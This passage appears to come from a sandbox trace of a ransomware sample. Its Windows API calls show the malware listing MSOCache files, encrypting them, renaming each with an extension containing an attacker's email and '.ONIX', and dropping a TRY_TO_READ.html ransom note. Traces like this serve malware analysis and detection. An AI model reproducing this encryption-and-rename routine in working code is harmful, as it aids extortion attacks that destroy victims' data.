lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0103.295] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0103.297] GetProcessHeap () returned 0x410000 [0103.297] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0103.297] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0103.297] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0103.297] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0103.297] FindNextFileW (in: hFindFile=0x48ebb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0103.297] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4445e0 | out: hHeap=0x410000) returned 1 [0103.297] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0103.297] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458858 [0103.297] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0103.297] GetLastError () returned 0x0 [0103.297] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x200 [0103.298] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0103.298] LockFile (hFile=0x200, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x5ac, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.298] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.298] ReadFile (in: hFile=0x200, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0103.300] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.300] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0103.300] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0103.300] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0103.300] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0103.300] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0103.300] GetProcessHeap () returned 0x410000 [0103.301] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0103.301] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" [0103.301] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0103.301] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1452) returned 1 [0103.301] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x5ac [0103.301] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0103.301] GetProcessHeap () returned 0x410000 [0103.301] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4b2b40 [0103.301] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4b2b40*, pdwDataLen=0x367f414*=0x100) returned 1 [0103.301] WriteFile (in: hFile=0x200, lpBuffer=0x4b2b40*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2b40*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0103.303] WriteFile (in: hFile=0x200, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0103.304] WriteFile (in: hFile=0x200, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0103.305] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5ac) returned 0x4d6b68 [0103.305] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x5ac) returned 0x4d7120 [0103.305] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.305] ReadFile (in: hFile=0x200, lpBuffer=0x4d6b68, nNumberOfBytesToRead=0x5ac, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b68*, lpNumberOfBytesRead=0x367f44c*=0x5ac, lpOverlapped=0x0) returned 1 [0103.305] SetFilePointer (in: hFile=0x200, lDistanceToMove=-1452, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.305] WriteFile (in: hFile=0x200, lpBuffer=0x4d7120*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d7120*, lpNumberOfBytesWritten=0x367f44c*=0x5ac, lpOverlapped=0x0) returned 1 [0103.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b68 | out: hHeap=0x410000) returned 1 [0103.307] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d7120 | out: hHeap=0x410000) returned 1 [0103.307] UnlockFile (hFile=0x200, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x5ac, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.307] CloseHandle (hObject=0x200) returned 1 [0103.308] GetProcessHeap () returned 0x410000 [0103.308] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0103.308] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0103.310] GetProcessHeap () returned 0x410000 [0103.310] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0103.310] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0103.310] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0103.310] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0103.310] FindNextFileW (in: hFindFile=0x48ebb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c42390, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c42390, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c42390, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0103.310] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0103.310] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0103.310] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458858 [0103.310] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0103.310] GetLastError () returned 0x0 [0103.310] FindNextFileW (in: hFindFile=0x48ebb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c42390, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c42390, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c42390, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0103.310] CloseHandle (hObject=0x3cc) returned 1 [0103.311] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0103.311] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x2a, wMilliseconds=0x2b4)) [0103.311] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0103.312] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0103.312] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0103.312] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0103.312] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0103.312] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0103.313] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0103.313] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x449d98 [0103.313] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0103.313] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4588e0 | out: hHeap=0x410000) returned 1 [0103.313] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f6a8 | out: hHeap=0x410000) returned 1 [0103.313] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30c42390, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c42390, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48ebf0 [0103.313] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0103.313] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0103.313] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0103.313] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0103.313] GetLastError () returned 0x0 [0103.313] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30c42390, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c42390, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.313] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0103.313] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0103.313] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0103.313] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0103.313] GetLastError () returned 0x0 [0103.313] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0103.313] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0103.313] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0103.313] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0103.313] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0103.313] GetLastError () returned 0x0 [0103.314] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x488 [0103.315] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0103.315] WriteFile (in: hFile=0x488, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0103.316] WriteFile (in: hFile=0x488, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0103.316] WriteFile (in: hFile=0x488, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0103.316] CloseHandle (hObject=0x488) returned 1 [0103.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473118 | out: hHeap=0x410000) returned 1 [0103.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0103.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0103.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0103.317] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0103.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0103.317] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0103.317] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0103.317] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0103.317] GetLastError () returned 0x0 [0103.317] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0103.318] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0103.318] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x91975, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.318] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.318] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0103.320] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.320] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0103.320] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0103.320] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0103.320] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", dwFileAttributes=0x80) returned 1 [0103.320] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 76 [0103.320] GetProcessHeap () returned 0x410000 [0103.321] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0103.321] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" [0103.321] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0103.321] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=596341) returned 1 [0103.321] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x91975 [0103.321] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0103.321] GetProcessHeap () returned 0x410000 [0103.321] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0103.321] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0103.321] WriteFile (in: hFile=0x488, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0103.323] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0103.324] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0103.325] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x91975) returned 0xf50020 [0103.326] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x91975) returned 0x2680020 [0103.326] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.326] ReadFile (in: hFile=0x488, lpBuffer=0xf50020, nNumberOfBytesToRead=0x91975, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50020*, lpNumberOfBytesRead=0x367f44c*=0x91975, lpOverlapped=0x0) returned 1 [0103.354] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x91975, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.354] CloseHandle (hObject=0x488) returned 1 [0103.355] GetProcessHeap () returned 0x410000 [0103.356] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0103.356] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0103.358] GetProcessHeap () returned 0x410000 [0103.358] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0103.358] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0103.358] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0103.358] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0103.358] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa26c9d00, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xa26c9d00, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0xe85142d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xccb88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0103.358] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0103.358] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 